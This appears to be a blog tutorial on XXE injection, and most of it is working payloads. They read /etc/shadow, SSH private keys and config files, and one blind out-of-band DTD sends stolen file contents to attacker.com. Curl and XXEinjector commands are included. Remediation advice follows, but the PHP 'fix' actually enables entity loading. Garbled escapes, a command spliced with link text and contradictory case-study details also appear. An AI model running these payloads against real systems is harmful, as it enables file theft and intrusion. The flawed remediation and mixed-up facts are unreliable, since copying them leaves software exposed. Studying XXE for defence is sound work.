XXE Injection: Discovery to Exploitation Guide – Hmmnm

10 min read · 1,885 words

XML External Entity (XXE) Injection remains one of the most dangerous web vulnerabilities, allowing attackers to interfere with XML processing, read sensitive files, and execute Server-Side Request Forgery (SSRF) attacks. This guide covers exploitation techniques from basic file disclosure to advanced blind XXE scenarios.

XML Security Vulnerabilities — XXE injection attack vectors in XML parsers

Understanding XXE Vulnerabilities

XXE attacks exploit XML parsers that process external entity references within XML documents. When an application accepts XML input without proper configuration, attackers can define custom entities that reference external Resources:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>

<data>&xxe;</data>
</root>

Types of XXE Attacks

1. In-Band XXE (Classic)

The server directly reflects the entity content in the response, allowing immediate file disclosure:

POST /api/process HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE data [

<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<input>&file;</input>

// Response contains /etc/passwd contents

No direct response, but attackers can exfiltrate data via out-of-band channels:

<?xml version="1.0"?>
<!DOCTYPE data [

<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">

%xxe;
]>
<input>test</input>

// evil.dtd on attacker server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

3. XXE-Based SSRF

Exploit XML parsers to make server-side requests to internal systems:

<?xml version="1.0"?>
<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
]>
<data>&xxe;</data>

// Access internal services behind firewall

Exploitation Techniques

File Disclosure Payloads

// Linux/Unix files
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///var/log/apache2/access.log">

// Windows files
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY xxe SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">

// Application files
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
<!ENTITY xxe SYSTEM "file:///app/credentials.xml">

Parameter Entity Attacks

<?xml version="1.0"?>
<!DOCTYPE data [

<!ENTITY % param1 "<!ENTITY param2 'Attack'>">

%param1;
]>
<root>&param2;</root>

XXE in SOAP Services

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

<soap:Header>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

</soap:Header>

<soap:Body>

<Login>

<Username>&xxe;</Username>

</Login>

</soap:Body>
</soap:Envelope>

Advanced XXE Scenarios

Cybersecurity Code Analysis — Exploiting XML external entity processing

XXE in File Uploads

Many applications parse XML from uploaded files (DOCX, XLSX, SVG, PDF). Attackers embed XXE payloads in these formats:

// Malicious SVG file
<svg xmlns="http://www.w3.org/2000/svg">

<!DOCTYPE svg [

<!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

<text x="10" y="20">&xxe;</text>
</svg>

Error-Based XXE

Trigger parser errors that leak file contents in error messages:

<?xml version="1.0"?>
<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "file:///nonexistent">
]>
<root>&xxe;</root>

// Error: Failed to load external entity "file:///nonexistent"

Detection and Testing

Manual Testing

# Test with curl
curl -X POST https://target.com/api

-H "Content-Type: application/xml"

--data '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>'

# Using Burp Suite Intruder
# Load XXE payloads from SecLists
# Monitor responses for file contents

Automated Tools

XXEinjector — Automated blind XXE exploitation
Burp Suite — Scanner extension for XXE detection
OWASP ZAP — Active scan rules for XXE

# XXEinjector usage
ruby XXEinjector.
 See also: OWASP XXE Vulnerability.rb --host=attacker.com --path=/etc/passwd --file=request.txt

# Results:
[+] File /etc/passwd retrieved:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Remediation Strategies

PHP (libxml)

<?php
// Disable external entities
libxml_disable_entity_loader(true);

// Or use flag with DOMDocument
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
?>

Java (JAXP)

// Disable DTD processing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

Python (lxml)

from lxml import etree

# Safe parser configuration
parser = etree.XMLParser(

resolve_entities=False,

no_network=True,

dtd_validation=False,

load_dtd=False
)

tree = etree.parse(xml_file, parser)

Real-World Impact

Facebook (2018) — XXE in image processing allowed file disclosure
LinkedIn (2012) — XXE via DOCX file uploads
Google (2017) — XXE in Blogger XML import feature

Further Reading:

OWASP XXE Guide
PortSwigger XXE Academy
PayloadsAllTheThings XXE

Real-World XXE Vulnerabilities: Case Studies

XXE vulnerabilities have been discovered in some of the most widely-used software platforms. See also: PortSwigger XXE Guide. Understanding these real-world cases helps pentesters recognize similar patterns during assessments.

1. Facebook XXE (2019)

In 2019, security researcher James Kettle demonstrated that Facebooku2019s GraphQL endpoint was vulnerable to XXE injection. By crafting a malicious XML payload within a multipart request, he was able to read internal metadata from Facebooku2019s backend servers. The vulnerability existed because Facebooku2019s XML parser accepted external entity Definitions without proper restriction. This case highlights that even tech giants with massive security teams can miss XXE if XML parsing isnu2019t explicitly hardened.

2. PayPal XXE (2018)

PayPal experienced an XXE vulnerability in their payment notification system. An attacker could craft an XML-based payment callback that included external entity references, potentially exposing internal server files. The fix involved disabling external entity processing and implementing strict XML schema validation on all incoming XML payloads.

3. WordPress REST API XXE

Several WordPress plugins have been found vulnerable to XXE through their XML-RPC interfaces or file upload handlers. When a plugin processes XML input without disabling external entities, an attacker can leverage the WordPress installation to read sensitive files like wp-config.php or execute SSRF attacks against internal services.

Advanced XXE Techniques

Blind XXE via Out-of-Band (OOB) Methods

When applications donu2019t return the results of XML processing in responses (blind XXE), you need alternative data exfiltration methods:

OOB via DNS: Use a payload like <!ENTITY xxe SYSTEM "http://attacker.com/"%26quot;%26quot;> to trigger DNS lookups that reveal file contents in subdomains.
OOB via HTTP: Load external DTDs from a server you control: <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">%dtd;
OOB via FTP: Some environments allow FTP protocol in entity declarations, useful when HTTP is blocked by egress firewalls.

XXE via File Upload

Many applications accept XML-based file formats like SVG, DOCX, XLSX, or PDF. Uploading a malicious SVG file with embedded XXE payload is a common bypass technique:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [

<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">

<text x="20" y="50">&xxe;</text>
</svg>

XXE Prevention Checklist

Disable external entities in your XML parser (this is the single most effective defense)
Disable DTD processing entirely unless absolutely required
Use JSON instead of XML for data exchange where possible
Implement input validation to reject XML containing DOCTYPE declarations
Configure network segregation to limit SSRF impact from XXE
Keep XML libraries updated u2014 many XXE patches are released as security updates
Use WAF rules to detect common XXE payload patterns

Conclusion

Security Hardening — XXE mitigation and secure XML parser configuration

XXE vulnerabilities continue to plague modern applications, especially those processing XML-based document formats. Implement parser hardening, disable external entity processing, and conduct regular security assessments to protect against these critical attacks.

📖 Related Reading

MCP Security & PentestingRead more →Phishing EvolutionRead more →Supply Chain SecurityRead more →

XXE in Different Frameworks

.NET (XmlDocument and XmlReader)

In .NET applications, XmlDocument is vulnerable to XXE by default in older versions. The key protection is setting XmlResolver to null and using XmlReader with secure settings. In .NET Framework 4.5.2 and later, XmlReaderSettings.DtdProcessing defaults to Prohibit, but explicitly setting it is recommended.

WCF (Windows Communication Foundation) services are particularly vulnerable because SOAP messages are XML-based. Ensure MaxReceivedMessageSize limits are configured to prevent XML bomb attacks which expand entity references exponentially to consume memory.

Node.js (libxmljs, xml2js, fast-xml-parser)

The libxmljs library processes XML using libxml2 under the hood. Disable DTD processing and external entity loading by setting noent, dtdload, and dtdattr to false. The xml2js library uses sax-js which is not vulnerable to XXE by default. However, fast-xml-parser v3 and later processes entities by default and should be configured with processEntities disabled.

XXE via JSON Content-Type

Some applications accept XML payloads even when the Content-Type is set to application/json. This occurs when backend parsers are lenient or auto-detect content types. Test by sending XML payloads with JSON Content-Type headers since the server may process the XML regardless of the documented format.

XXE Attack Patterns in Modern Applications

XXE in File Upload Processing

SVG (Scalable Vector Graphics) files are XML-based and commonly accepted as image uploads. An attacker can upload a malicious SVG containing XXE payloads. When the server processes the uploaded SVG for resizing, thumbnail generation, or metadata extraction, the XXE payload executes. Similarly, DOCX, XLSX, and PPTX files are ZIP archives containing XML files where extracting without sanitization enables XXE.

Defense: Never parse uploaded XML files with a standard XML parser. Use image processing libraries that do not execute XML content or sanitize SVG files by stripping DTD and entity declarations before processing.

XXE in SAML and SSO Systems

SAML (Security Assertion Markup Language) assertions are XML documents used in Single Sign-On systems. XXE in SAML is particularly dangerous because responses contain sensitive identity data. Some SAML libraries process entities before signature validation, allowing XXE even when the signature is invalid. Test SAML endpoints by injecting entity declarations into the SAMLResponse parameter.

OOB (Out-of-Band) XXE Techniques

HTTP-Based OOB XXE

When the application does not return XML processing errors (blind XXE), use out-of-band techniques to exfiltrate data. Define a parameter entity that loads an external DTD from an attacker-controlled server. The DTD contains a general entity that reads a local file and sends it via HTTP request. The attacker server receives the file contents. Use tools like Burp Collaborator or interactsh for receiving OOB callbacks.

DNS-Based OOB XXE

When HTTP-based exfiltration is blocked by firewalls, DNS-based techniques bypass restrictions. Parameter entities can include file contents in DNS queries to the attacker domain. DNS tunneling is slower but harder to block because DNS traffic is typically allowed through firewalls.

XXE via XInclude

Even when DTD processing is disabled, XInclude may still be available. XInclude is a standard mechanism for including external content in XML documents and does not require DTD processing. If the application processes XInclude directives, attackers can read local files and make SSRF requests without entity declarations.

Automated XXE Detection

Burp Suites active scanner includes XXE detection probes. The xxeinjector tool by PORTSWIGGER automates various XXE techniques including OOB, SSRF, and parameter entity attacks. For CI/CD pipelines, Semgrep rules can detect unsafe XML parser configurations in source code.